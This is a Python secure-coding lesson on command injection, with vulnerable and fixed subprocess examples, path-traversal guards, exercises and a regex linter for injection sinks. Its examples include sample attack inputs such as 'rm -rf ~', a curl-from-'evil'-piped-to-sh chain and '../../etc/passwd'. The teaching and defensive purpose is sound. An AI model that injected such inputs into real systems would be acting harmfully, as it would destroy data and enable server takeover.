PY-L8-43 · Subprocess Safely: Avoiding Command Injection

Learning Goals

3 min

By the end of this lesson you can:

Demonstrate command injection on a local demo and explain the root cause.
Apply the fix: the list form of subprocess, never shell=True with input.
Recognise the wider injection family: eval/exec, os.system, path traversal, SSTI.
Validate/allow-list when external input must influence a command.

Warm-Up · The Same Bug, A New Interpreter

5 min

SQL injection   input becomes SQL    → database runs it    (L8-30)
XSS             input becomes HTML/JS → browser runs it     (L8-32)
COMMAND inj.    input becomes shell   → the OS runs it       (today)
All three: untrusted input crosses into a CODE context (Lesson 2).

Today's big idea

Command injection is the same root cause you've seen twice, with the worst interpreter of all: the operating system shell. If you build a shell command by gluing in user input and run it with shell=True, the attacker's input can include ; rm -rf / or && curl evil | sh and the OS executes it — full server takeover. The fix is the same principle: keep code and data separate by passing arguments as a list, so input is never parsed by a shell.

New Concept · Injection & The Family

14 min

The vulnerable pattern

import subprocess
# VULNERABLE — user input glued into a shell command
def ping(host):
    subprocess.run(f"ping -c 1 {host}", shell=True)    # ✗ shell parses the string

# normal:  host = "example.com" → ping -c 1 example.com
# attack:  host = "x; rm -rf ~"  → ping -c 1 x; rm -rf ~   ← runs BOTH commands
# attack:  host = "x && curl http://evil/sh | sh"          ← downloads + runs malware

With shell=True, the string is handed to /bin/sh, which interprets ;, &&, |, $(), backticks — all of which let the attacker chain their own commands. Same for os.system and os.popen.

The fix: the list form (no shell)

import subprocess
# SAFE — arguments as a LIST; no shell involved
def ping(host):
    subprocess.run(["ping", "-c", "1", host])          # ✓ host is ONE argument

# attack:  host = "x; rm -rf ~"
#   → ping receives the literal argument "x; rm -rf ~" (an invalid hostname)
#   → ping fails harmlessly; the ; is just a character, not a command separator.

The list form passes each argument directly to the program — there's no shell to interpret metacharacters, so ; rm -rf ~ becomes a harmless (invalid) hostname. Same code/data separation as parameterised SQL and escaped HTML. Default to the list form; avoid shell=True entirely.

When you think you need the shell

Pipes/redirects? Do them in Python (chain processes via subprocess, capture output) — not via the shell with user input (Lesson 10).
Must include user input in args? Pass it as a list element. If it influences which command/option runs, allow-list it (map choices to fixed safe values), never interpolate.
Genuinely need shell features on trusted, fixed strings? Acceptable only when no part comes from user input — but prefer the list form regardless.

The wider injection family (same root, same fix)

eval / exec on input    → arbitrary Python execution. NEVER eval untrusted input.
os.system(... + input)  → command injection. Use subprocess list form.
pickle.loads(untrusted) → code execution (L8-35). Use json.
open(user_path)         → PATH TRAVERSAL: "../../etc/passwd". Validate/sandbox paths.
template from input     → SSTI (server-side template injection). Don't build templates
                          from user data; pass data INTO a fixed template.

⚠️ eval/exec on user input = instant RCE

eval(user_input) runs whatever the user typed as Python — __import__('os').system('rm -rf /') and you're owned. There is almost never a good reason to eval untrusted input. For "evaluate a math expression" use ast.literal_eval (data only) or a real parser. Treat any eval/exec/shell=True/pickle.loads on external data as a critical bug.

Path traversal — a special case worth knowing

from pathlib import Path
# VULNERABLE: user controls the path → "../../etc/passwd" escapes the dir
# open(os.path.join("uploads", request.args["file"]))   ✗

# SAFE: resolve and confirm the result stays INSIDE the allowed directory
BASE = Path("uploads").resolve()
def safe_path(user_name: str) -> Path:
    target = (BASE / user_name).resolve()
    if not target.is_relative_to(BASE):            # Python 3.9+: rejects ../ escapes
        raise ValueError("path traversal attempt")
    return target

Worked Example · Demo & Fix Command Injection (locally)

12 min

Goal: a safe, local demonstration that shell=True runs injected commands, then the list-form fix — using a harmless marker command instead of anything destructive. Your own machine only.

import subprocess, tempfile, os
from pathlib import Path

# a harmless "side effect" to detect injection: creating a marker file
marker = Path(tempfile.gettempdir()) / "INJECTED.txt"
marker.unlink(missing_ok=True)

# ✗ VULNERABLE: shell=True with attacker-controlled "host"
def vulnerable(host):
    # the attacker chains a harmless 'touch' to prove arbitrary execution
    subprocess.run(f"echo pinging {host}", shell=True,
                   capture_output=True, text=True)

# attack input runs a SECOND command via the shell:
attack = f"x; touch {marker}"
vulnerable(attack)
print("vulnerable → injected file created:", marker.exists())   # True (BAD)

marker.unlink(missing_ok=True)

# ✓ SAFE: list form — the whole string is one literal argument
def safe(host):
    subprocess.run(["echo", "pinging", host],
                   capture_output=True, text=True)

safe(attack)                                       # 'x; touch ...' is just text
print("safe → injected file created:", marker.exists())         # False (GOOD)

vulnerable → injected file created: True     ← shell ran the injected 'touch'
safe → injected file created: False          ← list form: input was inert text

Read the code

The marker file is the smoking gun: with shell=True, the attacker's ; touch INJECTED.txt executed as a real command (it created the file) — proving they could run anything (we used a harmless touch instead of something destructive). The list-form version treats the same input as a single literal argument to echo, so no second command runs and the file is never created. One change — list instead of shell=True — turns remote code execution into inert text. This is the same code/data separation that fixed SQLi and XSS, now protecting the OS itself.

Try It Yourself

13 min

All demos use harmless markers (touch/echo), on your own machine. Never test injection against anything you don't own.

01 🟢 Prove it, then fix it

Reproduce the marker-file demo: confirm shell=True runs an injected harmless command, and the list form doesn't. Then remove the marker.

02 🟡 Allow-list a command option

Write a function that runs one of a fixed set of safe diagnostics (e.g. uptime, df, free) chosen by user input — using an allow-list mapping, never interpolating the input into the command.

Hint

import subprocess
ALLOWED = {"uptime": ["uptime"], "disk": ["df", "-h"], "mem": ["free", "-m"]}
def diagnostic(choice):
    cmd = ALLOWED.get(choice)
    if not cmd:
        raise ValueError("unknown diagnostic")   # reject, don't interpolate
    return subprocess.run(cmd, capture_output=True, text=True).stdout

03 🔴 Path-traversal guard

Write a file-serving function that takes a user-supplied filename and returns its contents — but only if the resolved path stays inside an allowed directory. Confirm ../../etc/passwd (or a Windows equivalent) is rejected.

Hint

from pathlib import Path
BASE = Path("uploads").resolve()
def read_file(name):
    p = (BASE / name).resolve()
    if not p.is_relative_to(BASE):     # blocks ../ escapes
        raise ValueError("path traversal")
    return p.read_text(encoding="utf-8")

Mini-Challenge · An Injection-Sink Linter

8 min

Build a static scanner that flags the dangerous sinks across the injection family: shell=True, os.system/os.popen, eval/exec, pickle.loads, and yaml.load without SafeLoader. Report file + line with the safe alternative for each. (This overlaps with tools like bandit — you're building the idea.)

Show a sample solution

import re
from pathlib import Path

SINKS = {
    "shell=True":        ("shell=True", "use the list form: run([cmd, arg, ...])"),
    "os.system/popen":   (r"os\.(system|popen)\(", "use subprocess list form"),
    "eval/exec":         (r"\b(eval|exec)\(", "never eval input; use ast.literal_eval/parser"),
    "pickle.loads":      (r"pickle\.loads?\(", "use json for untrusted data (L8-35)"),
    "yaml.load (unsafe)":(r"yaml\.load\((?!.*SafeLoader)", "use yaml.safe_load"),
}

def scan(path: str) -> None:
    for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1):
        for name, (pat, fix) in SINKS.items():
            if re.search(pat, line):
                print(f"{path}:{n}: ⚠️ {name} — {fix}")
                print(f"    {line.strip()}")

scan("app.py")

Non-negotiables: flags shell=True, os.system, eval/exec, pickle.loads, unsafe yaml — with file:line and the safe fix for each.

Recap

3 min

Command injection is the SQLi/XSS root cause with the worst interpreter — the OS shell. Building a command with user input and shell=True (or os.system) lets an attacker chain commands (; rm -rf, && curl|sh) for full takeover. The fix is the same code/data separation: pass arguments as a list, never shell=True with input; allow-list when input picks the command/option. It generalises to the whole injection family — never eval/exec/pickle.loads untrusted data, and guard file paths against traversal. Encode the dangerous sinks as a linter and a CI gate.

Vocabulary Card

command injection: Untrusted input executed as a shell command (via shell=True/os.system).
list form: Passing args as a list so no shell parses them — the fix.
RCE: Remote Code Execution — running arbitrary code on the server (the worst outcome).
path traversal: Using ../ in a user path to escape the intended directory.

Homework

4 min

Demonstrate command injection (harmless marker) on a local demo and fix it with the list form. Build the allow-list diagnostic runner and the path-traversal guard. Build the injection-sink linter and run it on a project. Write a paragraph linking command injection, SQLi, and XSS to their shared root cause and shared cure (separate code from data).

Sample · the shared root cause

SQL injection, XSS, and command injection are the SAME bug pointed at
three different interpreters:
  - SQLi: input glued into a query → the DATABASE runs it.
  - XSS:  input put into a page    → the BROWSER runs it.
  - Cmd:  input put into a command → the OS SHELL runs it.
In each, untrusted DATA crossed into a CODE context (the trust-boundary
failure of L8-02).

The shared cure is the same: SEPARATE CODE FROM DATA so input can never
be interpreted as code —
  - SQLi → parameterised queries (placeholders + bound values).
  - XSS  → output escaping (data rendered as text, not markup).
  - Cmd  → the subprocess LIST form (args passed directly, no shell).
And the family rule: never eval/exec/pickle.loads/shell=True on
untrusted input; allow-list when input must steer a command; guard
file paths against ../ traversal. My linter flags all these sinks.

Non-negotiables: demonstrated+fixed command injection, allow-list runner, traversal guard, the linter, and the unified root-cause/cure explanation.

SQL injection input becomes SQL → database runs it (L8-30) XSS input becomes HTML/JS → browser runs it (L8-32) COMMAND inj. input becomes shell → the OS runs it (today) All three: untrusted input crosses into a CODE context (Lesson 2).

import subprocess # VULNERABLE — user input glued into a shell command def ping(host): subprocess.run(f"ping -c 1 {host}", shell=True) # ✗ shell parses the string # normal: host = "example.com" → ping -c 1 example.com # attack: host = "x; rm -rf ~" → ping -c 1 x; rm -rf ~ ← runs BOTH commands # attack: host = "x && curl http://evil/sh | sh" ← downloads + runs malware

import subprocess # SAFE — arguments as a LIST; no shell involved def ping(host): subprocess.run(["ping", "-c", "1", host]) # ✓ host is ONE argument # attack: host = "x; rm -rf ~" # → ping receives the literal argument "x; rm -rf ~" (an invalid hostname) # → ping fails harmlessly; the ; is just a character, not a command separator.

eval / exec on input → arbitrary Python execution. NEVER eval untrusted input. os.system(... + input) → command injection. Use subprocess list form. pickle.loads(untrusted) → code execution (L8-35). Use json. open(user_path) → PATH TRAVERSAL: "../../etc/passwd". Validate/sandbox paths. template from input → SSTI (server-side template injection). Don't build templates from user data; pass data INTO a fixed template.

from pathlib import Path # VULNERABLE: user controls the path → "../../etc/passwd" escapes the dir # open(os.path.join("uploads", request.args["file"])) ✗ # SAFE: resolve and confirm the result stays INSIDE the allowed directory BASE = Path("uploads").resolve() def safe_path(user_name: str) -> Path: target = (BASE / user_name).resolve() if not target.is_relative_to(BASE): # Python 3.9+: rejects ../ escapes raise ValueError("path traversal attempt") return target

import subprocess, tempfile, os from pathlib import Path # a harmless "side effect" to detect injection: creating a marker file marker = Path(tempfile.gettempdir()) / "INJECTED.txt" marker.unlink(missing_ok=True) # ✗ VULNERABLE: shell=True with attacker-controlled "host" def vulnerable(host): # the attacker chains a harmless 'touch' to prove arbitrary execution subprocess.run(f"echo pinging {host}", shell=True, capture_output=True, text=True) # attack input runs a SECOND command via the shell: attack = f"x; touch {marker}" vulnerable(attack) print("vulnerable → injected file created:", marker.exists()) # True (BAD) marker.unlink(missing_ok=True) # ✓ SAFE: list form — the whole string is one literal argument def safe(host): subprocess.run(["echo", "pinging", host], capture_output=True, text=True) safe(attack) # 'x; touch ...' is just text print("safe → injected file created:", marker.exists()) # False (GOOD)

import subprocess ALLOWED = {"uptime": ["uptime"], "disk": ["df", "-h"], "mem": ["free", "-m"]} def diagnostic(choice): cmd = ALLOWED.get(choice) if not cmd: raise ValueError("unknown diagnostic") # reject, don't interpolate return subprocess.run(cmd, capture_output=True, text=True).stdout

from pathlib import Path BASE = Path("uploads").resolve() def read_file(name): p = (BASE / name).resolve() if not p.is_relative_to(BASE): # blocks ../ escapes raise ValueError("path traversal") return p.read_text(encoding="utf-8")

import re from pathlib import Path SINKS = { "shell=True": ("shell=True", "use the list form: run([cmd, arg, ...])"), "os.system/popen": (r"os\.(system|popen)\(", "use subprocess list form"), "eval/exec": (r"\b(eval|exec)\(", "never eval input; use ast.literal_eval/parser"), "pickle.loads": (r"pickle\.loads?\(", "use json for untrusted data (L8-35)"), "yaml.load (unsafe)":(r"yaml\.load\((?!.*SafeLoader)", "use yaml.safe_load"), } def scan(path: str) -> None: for n, line in enumerate(Path(path).read_text(encoding="utf-8").splitlines(), 1): for name, (pat, fix) in SINKS.items(): if re.search(pat, line): print(f"{path}:{n}: ⚠️ {name} — {fix}") print(f" {line.strip()}") scan("app.py")